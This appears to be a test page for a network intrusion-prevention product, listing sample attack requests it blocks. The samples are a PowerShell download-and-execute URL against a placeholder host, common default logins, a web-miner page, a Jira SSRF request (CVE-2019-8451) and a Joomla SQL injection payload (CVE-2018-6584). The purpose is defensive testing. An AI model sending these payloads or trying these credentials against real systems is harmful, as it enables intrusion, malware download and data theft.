Anti-Intrusion Test

HydraCrypt Botnet Download and Execute

• Requests of below pattern are usually expolited by Botnet to download malware. To protect a server from being attacked or to prevent a client from attacking others, this kind of requests should be blocked.
• URL: /hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20system.net.webclient).downloadfile('http://xxx/download.exe')
• Anti-Intrusion protects servers from being attacked as well as preventing clients from attacking others.

Default Password or Null Password

• Basic Auth using default password is very dangerous and should be blocked.
• Examples: admin/password, root/123456, user/user, support/support
• URL: /signin
• Anti-Intrusion protects users from being attacked due to insecure configuration.

Web Miner Crypto-Loot

• JavaScript based Cryptocurrency Miner may consume your CPU without your permission. This behavior should be blocked.
• URL: /files/web_miner.html
• Anti-Intrusion protects users' computing power from being stolen.

Jira Server Side Request Forgery (SSRF) vulnerability

• The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class..
• CVE-2019-8451
• URL: /plugins/servlet/gadgets/makeRequest?url=http://secutest.cloud.lionic.com:8080@resource.company.local/
• Anti-Intrusion provides virtual patch for old systems with potential vulnerabilities.

SERVER-WEBAPP Joomla DT Register SQL Injection

• SQL Injection exists in the DT Register 3.2.7 component for Joomla! via a task=edit&id= request.
• CVE-2018-6584
• URL: /joomla/index.php?option=com_dtregister&task=edit&controller=category&id=%27OR%201=1%20--
• Anti-Intrusion protects servers from SQL Injection attack.